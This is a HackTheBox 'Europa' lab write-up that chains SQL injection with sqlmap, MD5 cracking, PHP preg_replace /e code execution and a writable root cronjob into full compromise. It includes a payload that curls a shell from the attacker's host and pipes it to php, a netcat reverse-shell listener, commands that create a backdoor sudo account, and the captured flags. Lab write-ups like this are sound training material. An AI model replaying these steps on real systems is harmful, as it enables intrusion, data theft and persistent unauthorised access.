Europa
Starting with a port scan.
root@n0w4n:~# nmap -vv -n -T4 -A -sC -p- 10.10.10.22
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-06 10:35 CEST
Nmap scan report for 10.10.10.22
Host is up, received reset ttl 63 (0.025s latency).
Scanned at 2018-07-06 10:35:34 CEST for 246s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:55:42:0a:f7:06:8c:67:c0:e2:5c:05:db:09:fb:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCh1/OK73CDKnJigk6uMUzDLSQhCHSpt9xL+SJrizWdCa7edGviU3NU/8So5xOOgzV1k8u3qHsudNnTSiH8Ek9d2c48B3xYHZn5+nPDv22fZ82LIRKd5qSLhthk91bL3uV+/CURpOZshvo0bVPS48UQaw5r7pWTE0goB+qyG2csY7hr3+9C7Sx4L/Vx7MOFuGAoy/EnpHG10f12ZJ6IVrX8mMEyZGb3Bh7crRN8tQ2RAvnJxyj+1ZeDo7Vr2F75r//dEL2iQ4S2Iuz8BocjQMREyIguIOSOJxjc/L52TpioRHnNK/aEArT02uakB4jRyd5LTSsijjitgUlAk/3H2cYd
| 256 b1:ea:5e:c4:1c:0a:96:9e:93:db:1d:ad:22:50:74:75 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEqrLpdz7aDIUDy3bslqFlbGCrL4Q6tQmesbTP73F/Rv0GO6bb3zHETnZwVB5AKes/pQdRrbDlQCtR2v2WsTXsw=
| 256 33:1f:16:8d:c0:24:78:5f:5b:f5:6d:7f:f7:b4:f2:e5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDE2hVC32u7eNINSvsmSQkbMlUkJ7s0oiG/bxPhwZb/b
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| ssl-cert: Subject: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Subject Alternative Name: DNS:www.europacorp.htb, DNS:admin-portal.europacorp.htb
| Issuer: commonName=europacorp.htb/organizationName=EuropaCorp Ltd./stateOrProvinceName=Attica/countryName=GR/localityName=Athens/emailAddress=admin@europacorp.htb/organizationalUnitName=IT
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-04-19T09:06:22
| Not valid after: 2027-04-17T09:06:22
| MD5: 35d5 1c04 7ae8 0f5c 35a0 bc49 53e5 d085
| SHA-1: ced9 8f01 1228 e35d 83d3 2634 b4c1 ed52 b917 3335
| -----BEGIN CERTIFICATE-----
| MIIFSDCCA7CgAwIBAgIJAPGhMP4FtiTCMA0GCSqGSIb3DQEBCwUAMIGUMQswCQYD
| VQQGEwJHUjEPMA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNV
| BAoMD0V1cm9wYUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9w
| YWNvcnAuaHRiMSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjAe
| Fw0xNzA0MTkwOTA2MjJaFw0yNzA0MTcwOTA2MjJaMIGUMQswCQYDVQQGEwJHUjEP
| MA0GA1UECAwGQXR0aWNhMQ8wDQYDVQQHDAZBdGhlbnMxGDAWBgNVBAoMD0V1cm9w
| YUNvcnAgTHRkLjELMAkGA1UECwwCSVQxFzAVBgNVBAMMDmV1cm9wYWNvcnAuaHRi
| MSMwIQYJKoZIhvcNAQkBFhRhZG1pbkBldXJvcGFjb3JwLmh0YjCCAaIwDQYJKoZI
| hvcNAQEBBQADggGPADCCAYoCggGBAKzVzRrrM1MSWnf8zniIPKt0SXGDB2msYUm3
| rQJ3j31wPfn9xJOWeIpBCIbtXkRqO3XGrLjG/M0Slp3sa/lQ+1dk8aupaudrJvCm
| ITzLnGvtzrtyDlPkozH2wqM+tJx351gKhfrdF81TItS8oe3yskPW3MvEDbi5lPQM
| OVZk4dhFT4l94E1zrRoapU9fqNL66BdEzeEdS6XwntdARBrEyEoCp7nFIGMBKSIn
| JzxIh2VS98ybxkw58QcDEG9ClDH49nglkKmQfAevGKil8f1f9NYRwW3YOCvuzAA7
| Osg+pLEp4de6MEf408+AOhxl4CvgZKYWvmu7b+OSrFDN8cHFy/bQ2fvrjXNazjA0
| 9FIj4wivJ7JgJOCdXEianNZkvLzqPXGS/dVUrFF5fzyG0z5xOTvABZp86fNa3yNu
| zLb04h3j04SvfJ+T3CzkZDWVsFvOYdKsce600S/iaUoqE7XQH6QPB54ba5ailVtH
| npmV1uVqVxT7tXAs0ztIDpqzJ0XAnwIDAQABo4GaMIGXMB0GA1UdDgQWBBSdw09g
| /iRsaKt8R137PRpTAfuTgTA6BgNVHREEMzAxghJ3d3cuZXVyb3BhY29ycC5odGKC
| G2FkbWluLXBvcnRhbC5ldXJvcGFjb3JwLmh0YjAfBgNVHSMEGDAWgBSdw09g/iRs
| aKt8R137PRpTAfuTgTAMBgNVHRMEBTADAQH/MAsGA1UdDwQEAwIFoDANBgkqhkiG
| 9w0BAQsFAAOCAYEAbv2ccFD/d2ovr3dkIqL1m2Qo3AgMObUaBczB37KDsB0w6lzf
| EOM/aBVth8LarblnVUJE0tk8Io7VBcTP9hF2nt3BuSM0mF6yMY3WRY+23JJpNxSO
| nOrZ1xLB7a6XTwSTWD0kg2bRbjSbiEWaUzY/RrqtCF1NThgyXo0wuMWPpPICmbd/
| 5ID8iOH+rmR3nR4fP80J38SUmvrsXAmifbsbKaKHspNMclQ2Idfiyv53xAoFrJzV
| cuxHKyBxYn8A5DPRIhbesLF2NAy0d4aziNeVgGQnSA9cV9RhN454nuzwqKb33BlF
| L8cpG59w3xR8RuyTyZql4uBPZtogzh0pc0PyxX2E2O5nbn85aqYDkVW7aUkeiU69
| LAiIp8s6Z+Rhe2rN4RAudtMcWaMTwjBOb1k1UrJ+0T7Av3O5nJk5kd/Ee5LUD2jX
| wE9Q72WLg1HP/PSSJPsNASSAW4OWSYG1CqLIhfRk5wJtfi6oR9VO+CpajWvqB0Ej
| PTXIrDgdEK1VKan9
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.70%E=4%D=7/6%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5B3F2ACC%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=10A%TI=Z%II=I%TS=8)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 1.581 days (since Wed Jul 4 20:42:20 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 24.76 ms 10.10.14.1
2 24.83 ms 10.10.10.22
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 10:39
Completed NSE at 10:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.88 seconds
Raw packets sent: 131237 (5.778MB) | Rcvd: 188 (13.883KB)
So there is a SSH server running and a webserver on port 80 and 443. There is a certificate available and when looking at that certificate I noticed DNS information.
Because there is only one IP address, but 2 hostnames it looks like there is some virtual host routing (explanation).
Grabbing the HTTP header with Burp.
GET / HTTP/1.1 Host: 10.10.10.22 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT If-None-Match: "30a7-5554012ba5aba-gzip" Cache-Control: max-age=0
And changing the host.
GET / HTTP/1.1 Host: admin-portal.europacorp.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Wed, 26 Jul 2017 22:36:04 GMT If-None-Match: "30a7-5554012ba5aba-gzip" Cache-Control: max-age=0
And as a response I get a redirect to a login page.
HTTP/1.1 302 Found Date: Fri, 06 Jul 2018 10:11:20 GMT Server: Apache/2.4.18 (Ubuntu) Location: https://admin-portal.europacorp.htb/login.php Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
When I follow the redirect burp doesn’t know where to go and that’s because of the hostname which it doesn’t know. Altering the /etc/hosts file will change that.
10.10.10.22 admin-portal.europacorp.htb
Now I can access the admin portal.
When checking the source page there is a CSS file which tells me that the framework used is a CMS called Bootstrap.
Let’s try to log in……..nope.
I capture the HTTP header with burp and feed it to sqlmap. Sqlmap tries to go to port 80 and doesn’t find the URL. So I add ‘:443’ to the host in the header file. Another possibile optinos is use the –forse-ssl flag in sqlmap.
root@n0w4n:~/opt/htb/europa# sqlmap -r header.txt --risk=3 --level=5 --dbs
After a while I get some result.
Database: admin Table: users [2 entries] +----+----------------------+--------+---------------+----------------------------------+ | id | email | active | username | password | +----+----------------------+--------+---------------+----------------------------------+ | 1 | admin@europacorp.htb | 1 | administrator | 2b6d315337f18617ba18922c0b9597ff | | 2 | john@europacorp.htb | 1 | john | 2b6d315337f18617ba18922c0b9597ff | +----+----------------------+--------+---------------+----------------------------------+
After a quick search on some MD5 crackers online I get the result.
2b6d315337f18617ba18922c0b9597ff MD5 : SuperSecretPassword!
Almost everything is inactive, except for the ‘Tools’ section.
Within the Tools section there is an OpenVPN Config Generator with an input field.
"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "ip_address",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"ip_address/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}
What does it do?
"openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "10.10.14.3",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"10.10.14.3/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}
It replaces ‘ip_address’ with my given value (in this case 10.10.14.3). Can I misuse this? Let’s run it through Burp again.
POST /tools.php HTTP/1.1 Host: admin-portal.europacorp.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://admin-portal.europacorp.htb/tools.php Cookie: PHPSESSID=53pne4hhcormh5obflmmonjvb4 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 1688 pattern=%2Fip_address%2F&ipaddress=10.10.14.3&text=%22openvpn%22%3A+%7B%0D%0A++++++++%22vtun0%22%3A+%7B%0D%0A++++++++++++++++%22local-address%22%3A+%7B%0D%0A++++++++++++++++++++++++%2210.10.10.1%22%3A+%22%27%27%22%0D%0A++++++++++++++++%7D%2C%0D%0A++++++++++++++++%22local-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22mode%22%3A+%22site-to-site%22%2C%0D%0A++++++++++++++++%22openvpn-option%22%3A+%5B%0D%0A++++++++++++++++++++++++%22--comp-lzo%22%2C%0D%0A++++++++++++++++++++++++%22--float%22%2C%0D%0A++++++++++++++++++++++++%22--ping+10%22%2C%0D%0A++++++++++++++++++++++++%22--ping-restart+20%22%2C%0D%0A++++++++++++++++++++++++%22--ping-timer-rem%22%2C%0D%0A++++++++++++++++++++++++%22--persist-tun%22%2C%0D%0A++++++++++++++++++++++++%22--persist-key%22%2C%0D%0A++++++++++++++++++++++++%22--user+nobody%22%2C%0D%0A++++++++++++++++++++++++%22--group+nogroup%22%0D%0A++++++++++++++++%5D%2C%0D%0A++++++++++++++++%22remote-address%22%3A+%22ip_address%22%2C%0D%0A++++++++++++++++%22remote-port%22%3A+%221337%22%2C%0D%0A++++++++++++++++%22shared-secret-key-file%22%3A+%22%2Fconfig%2Fauth%2Fsecret%22%0D%0A++++++++%7D%2C%0D%0A++++++++%22protocols%22%3A+%7B%0D%0A++++++++++++++++%22static%22%3A+%7B%0D%0A++++++++++++++++++++++++%22interface-route%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++%22ip_address%2F24%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++%22next-hop-interface%22%3A+%7B%0D%0A++++++++++++++++++++++++++++++++++++++++++++++++%22vtun0%22%3A+%22%27%27%22%0D%0A++++++++++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++++++++++%7D%0D%0A++++++++++++++++++++++++%7D%0D%0A++++++++++++++++%7D%0D%0A++++++++%7D%0D%0A%7D%0D%0A++++++++++++++++++++++++++++++++
Mostly URL encoded. Decoding in Burp is easy.
pattern=/ip_address/&ipaddress=10.10.14.3&text="openvpn": {
"vtun0": {
"local-address": {
"10.10.10.1": "''"
},
"local-port": "1337",
"mode": "site-to-site",
"openvpn-option": [
"--comp-lzo",
"--float",
"--ping 10",
"--ping-restart 20",
"--ping-timer-rem",
"--persist-tun",
"--persist-key",
"--user nobody",
"--group nogroup"
],
"remote-address": "ip_address",
"remote-port": "1337",
"shared-secret-key-file": "/config/auth/secret"
},
"protocols": {
"static": {
"interface-route": {
"ip_address/24": {
"next-hop-interface": {
"vtun0": "''"
}
}
}
}
}
}
So the php function replaces a value with another value that was given by the user. When searching Google I found this was the preg_replace function (link).
It looks like this function searches the subject for pattern matching and replaces them with given replacement. With this PCRE there are a bunch of modifiers available and one of them stands out from the rest. It looks like the /e modifier is deprecated because of some security issues (link). The preferred function nowadays should be preg_replace_callback().
But why is this modifier so bad? On this site there is an excellent explanation why using preg_replace is such a bad idea. In a nutshell if this modifier is set, preg_replace() does normal substitution of backreferences in the replacement string, evaluates it as PHP code, and uses the result for replacing the search string. Single quotes, double quotes, backslashes (\) and NULL chars will be escaped by backslashes in substituted backreferences. As /e evaluates arbitrary PHP code it can easily be exploited if user input is not carefully validated or sanitized.
Let’s see if commands will be executed.
Looks like the commands are executed just nicely.
Now let’s get a shell. For this I use one of my favorites: pentestmonkey. The script is altered to point back to my ip + port.
Setting up listener.
root@n0w4n:~/opt/htb/europa# nc -lvnp 31337 listening on [any] 31337 ...
Entering in same repeater window of Burp.
pattern=/ip_address/e&ipaddress=system('curl http://10.10.14.3:8000/shell.php | php;')&text="openvpn": {
Response on my machine.
root@n0w4n:~/opt/htb/europa# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 10.10.10.22 - - [06/Jul/2018 14:50:26] "GET /shell.php HTTP/1.1" 200 -
And I have a working shell.
root@n0w4n:~/opt/htb/europa# nc -lvnp 31337 listening on [any] 31337 ... connect to [10.10.14.3] from (UNKNOWN) [10.10.10.22] 41852 Linux europa 4.4.0-81-generic #104-Ubuntu SMP Wed Jun 14 08:17:06 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 15:53:06 up 7 min, 0 users, load average: 0.00, 0.06, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
Because this is a temporary shell I wanted to upload a more permanent one which I could execute from the /var/www/admin folder, but it was write restricted.
After exiting the /admin/ folder I noticed a /var/www/cmd and /var/www/cronjobs folder. The /cmd was empty but inside the /cronjobs folder there was a file named clearlogs
#!/usr/bin/php
<?php
$file = '/var/www/admin/logs/access.log';
file_put_contents($file, '');
exec('/var/www/cmd/logcleared.sh');
?>
For the enumeration part I uploaded the LinEnum script and run it from /tmp.
[-] It looks like we have some admin users: uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm) uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),117(lpadmin),118(sambashare) ... [-] Contents of /etc/passwd: john:x:1000:1000:John Makris,,,:/home/john:/bin/bash ... [-] Are permissions on /home directories lax: total 12K drwxr-xr-x 3 root root 4.0K Apr 18 2017 . drwxr-xr-x 23 root root 4.0K Jun 23 2017 .. drwxr-xr-x 4 john john 4.0K Jun 23 2017 john [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux /usr/bin/screen
[-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # * * * * * root /var/www/cronjobs/clearlogs
Here is the cronjob from earlier. Looks like it runs every minute.
From earlier in the LinEnum output it looked like the /home/john folder is open for anyone….so let’s have a look for a flag.
$ cd /home/john $ ls -lah total 40K drwxr-xr-x 4 john john 4.0K Jun 23 2017 . drwxr-xr-x 3 root root 4.0K Apr 18 2017 .. -rw------- 1 john john 1 Dec 24 2017 .bash_history -rw-r--r-- 1 john john 220 Apr 18 2017 .bash_logout -rw-r--r-- 1 john john 3.7K Apr 18 2017 .bashrc drwx------ 2 john john 4.0K Apr 18 2017 .cache drwxrwxr-x 2 john john 4.0K Apr 18 2017 .nano -rw-r--r-- 1 john john 655 Apr 18 2017 .profile -rw------- 1 root root 1.0K Apr 19 2017 .rnd -rw-r--r-- 1 john john 0 Apr 18 2017 .sudo_as_admin_successful -r--r--r-- 1 root john 33 Jun 23 2017 user.txt $ cat user.txt 2f8d40cc05295154a9c3452c19ddc221
Now for the elevated rights and the final flag.
$ cd /var/www/cmd $ ls -lah total 8.0K drwxrwxr-x 2 root www-data 4.0K May 12 2017 . drwxr-xr-x 6 root root 4.0K May 12 2017 .. $ echo -ne "#!/bin/bash\ntouch /tmp/test.txt" > logcleared.sh $ ls -lah total 12K drwxrwxr-x 2 root www-data 4.0K Jul 6 16:58 . drwxr-xr-x 6 root root 4.0K May 12 2017 .. -rw-rw-rw- 1 www-data www-data 36 Jul 6 16:58 logcleared.sh $ chmod +x logcleared.sh $ ls -lah /tmp total 36K drwxrwxrwt 9 root root 4.0K Jul 6 16:59 . drwxr-xr-x 23 root root 4.0K Jun 23 2017 .. drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .ICE-unix drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .Test-unix drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .X11-unix drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .XIM-unix drwxrwxrwt 2 root root 4.0K Jul 6 16:52 .font-unix drwx------ 3 root root 4.0K Jul 6 16:52 systemd-private-b62d0155be1d4db89f375b92afe80b91-systemd-timesyncd.service-LsnZ9N -rw-r--r-- 1 root root 0 Jul 6 16:59 test.txt drwx------ 2 root root 4.0K Jul 6 16:52 vmware-root
Looks like that worked. Now for some better content.
$ echo -ne "\nuseradd -m n0w4n" >> logcleared.sh $ echo "echo 'n0w4n:password1' | chpasswd" >> logcleared.sh $ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:108:112::/var/run/dbus:/bin/false uuidd:x:109:113::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin john:x:1000:1000:John Makris,,,:/home/john:/bin/bash n0w4n:x:1001:1001::/home/n0w4n: $ echo "usermod -aG sudo n0w4n" >> logcleared.sh
That went well.
root@n0w4n:~/opt/htb/europa# ssh n0w4n@10.10.10.22 n0w4n@10.10.10.22's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Fri Jul 6 17:09:50 2018 from 10.10.14.3 $ id uid=1001(n0w4n) gid=1001(n0w4n) groups=1001(n0w4n),27(sudo)
$ sudo -i [sudo] password for n0w4n: root@europa:~# cd /root root@europa:~# ls -lah total 32K drwx------ 4 root root 4.0K Jun 23 2017 . drwxr-xr-x 23 root root 4.0K Jun 23 2017 .. -rw------- 1 root root 1 Dec 24 2017 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc drwx------ 2 root root 4.0K May 12 2017 .cache drwxr-xr-x 2 root root 4.0K Apr 19 2017 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -r-------- 1 root root 33 Jun 23 2017 root.txt root@europa:~# cat root.txt 7f19438b27578e4fcc8bef3a029af5a5
And done.
An easier and quicker way to get the flag was to change the password of root and ssh in as root or even just cat the /root/root.txt into a readable file.
But hey…..there are always other ways to get things done.